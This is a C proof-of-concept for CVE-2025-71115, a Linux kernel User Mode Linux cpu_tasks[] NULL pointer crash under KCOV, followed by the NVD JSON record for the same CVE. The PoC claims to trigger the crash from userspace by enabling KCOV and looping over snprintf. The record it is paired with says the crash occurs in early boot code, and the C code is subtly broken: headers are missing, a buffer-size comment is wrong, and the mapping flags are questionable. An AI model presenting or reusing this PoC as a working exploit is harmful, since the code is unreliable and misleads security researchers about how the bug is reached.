CVE-2025-71115

// PoC for CVE-2025-71115: Linux kernel UML cpu_tasks NULL pointer dereference // This PoC demonstrates the crash condition when KCOV is enabled // Compile: gcc -o cve_2025_71115_poc cve_2025_71115_poc.c #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/mman.h> #define KCOV_INIT_TRACE _IOR('c', 1, unsigned long) #define KCOV_ENABLE _IO('c', 100) #define KCOV_DISABLE _IO('c', 101) #define KCOV_TRACE_PC 0 int main() { printf("CVE-2025-71115 PoC - Linux Kernel UML cpu_tasks NULL pointer\n"); printf("Target: Linux Kernel with KCOV enabled on UML architecture\n"); printf("Severity: Medium (CVSS 5.5)\n\n"); // Open KCOV device (requires kernel support) int kcov_fd = open("/sys/kernel/debug/kcov", O_RDWR); if (kcov_fd < 0) { printf("[!] KCOV not available or permission denied\n"); printf("[i] This PoC requires:\n"); printf(" - Linux kernel with KCOV enabled (CONFIG_KCOV=y)\n"); printf(" - User Mode Linux (UML) architecture\n"); printf(" - Root or elevated privileges\n"); return 1; } // Get coverage buffer size unsigned long size = 1 << 20; // 4MB buffer unsigned long *cover = (unsigned long *)mmap(NULL, size * sizeof(unsigned long), PROT_READ | PROT_WRITE, MAP_PRIVATE, kcov_fd, 0); if (cover == MAP_FAILED) { perror("[-] mmap failed"); close(kcov_fd); return 1; } // Initialize KCOV if (ioctl(kcov_fd, KCOV_INIT_TRACE, size)) { perror("[-] KCOV_INIT_TRACE failed"); close(kcov_fd); return 1; } // Enable KCOV in trace-pc mode // This triggers the vulnerable code path in UML if (ioctl(kcov_fd, KCOV_ENABLE, KCOV_TRACE_PC)) { perror("[-] KCOV_ENABLE failed"); close(kcov_fd); return 1; } // Trigger memparse() call which has KCOV annotations // In UML with uninitialized cpu_tasks[], this causes NULL pointer dereference // The crash occurs in check_kcov_mode() when current is NULL printf("[*] KCOV enabled, triggering vulnerable code path...\n"); // Perform operations that trigger KCOV instrumentation for (int i = 0; i < 1000; i++) { volatile char buffer[256]; snprintf(buffer, sizeof(buffer), "0x%x", i); } // Disable KCOV ioctl(kcov_fd, KCOV_DISABLE, 0); printf("[i] PoC completed - kernel may have crashed if vulnerable\n"); close(kcov_fd); return 0; } /* Vulnerability Explanation: 1. The cpu_tasks[] array in Linux kernel UML is initialized late in boot 2. With KCOV enabled, init code calls functions with coverage annotations 3. check_kcov_mode() uses 'current' macro which depends on cpu_tasks[] 4. If cpu_tasks[] is not initialized, 'current' is NULL causing crash 5. Fix: Initialize cpu_tasks[] statically at compile time Note: This PoC requires specific conditions: - User Mode Linux (UML) architecture - Kernel compiled with CONFIG_KCOV=y - Access to /sys/kernel/debug/kcov */

{"cve": {"id": "CVE-2025-71115", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-01-14T15:16:01.177", "lastModified": "2026-03-25T19:00:38.887", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\num: init cpu_tasks[] earlier\n\nThis is currently done in uml_finishsetup(), but e.g. with\nKCOV enabled we'll crash because some init code can call\ninto e.g. memparse(), which has coverage annotations, and\nthen the checks in check_kcov_mode() crash because current\nis NULL.\n\nSimply initialize the cpu_tasks[] array statically, which\nfixes the crash. For the later SMP work, it seems to have\nnot really caused any problems yet, but initialize all of\nthe entries anyway."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\num: inicializar cpu_tasks[] antes\n\nEsto se hace actualmente en uml_finishsetup(), pero, por ejemplo, con KCOV habilitado nos bloquearemos porque algún código de inicialización puede llamar, por ejemplo, a memparse(), que tiene anotaciones de cobertura, y luego las comprobaciones en check_kcov_mode() fallan porque current es NULL.\n\nSimplemente inicializar el array cpu_tasks[] estáticamente, lo que soluciona el fallo. Para el trabajo SMP posterior, parece no haber causado realmente ningún problema todavía, pero inicializar todas las entradas de todos modos."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.13.1", "versionEndExcluding": "6.18.3", "matchCriteriaId": "1175098E-51C5-4022-AD0A-C8985F2787C6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.13:-:*:*:*:*:*:*", "matchCriteriaId": "5A3F9505-6B98-4269-8B81-127E55A1BF00"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc1:*:*:*:*:*:*", "matchCriteriaId": "17B67AA7-40D6-4AFA-8459-F200F3D7CFD1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc2:*:*:*:*:*:*", "matchCriteriaId": "C47E4CC9-C826-4FA9-B014-7FE3D9B318B2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc3:*:*:*:*:*:*", "matchCriteriaId": "F71D92C0-C023-48BD-B3B6-70B638EEE298"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc4:*:*:*:*:*:*", "matchCriteriaId": "13580667-0A98-40CC-B29F-D12790B91BDB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc5:*:*:*:*:*:*", "matchCriteriaId": "CAD1FED7-CF48-47BF-AC7D-7B6FA3C065FC"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc6:*:*:*:*:*:*", "matchCriteriaId": "3EF854A1-ABB1-4E93-BE9A-44569EC76C0D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc7:*:*:*:*:*:*", "matchCriteriaId": "F5DC0CA6-F0AF-4DDF-A882-3DADB9A886A7"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:rc8:*:*:*:*:*:*", "matchCriteriaId": "EB5B7DFC-C36B-45D8-922C-877569FDDF43"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/7b5d4416964c07c902163822a30a622111172b01", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/dbbf6d47130674640cd12a0781a0fb2a575d0e44", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}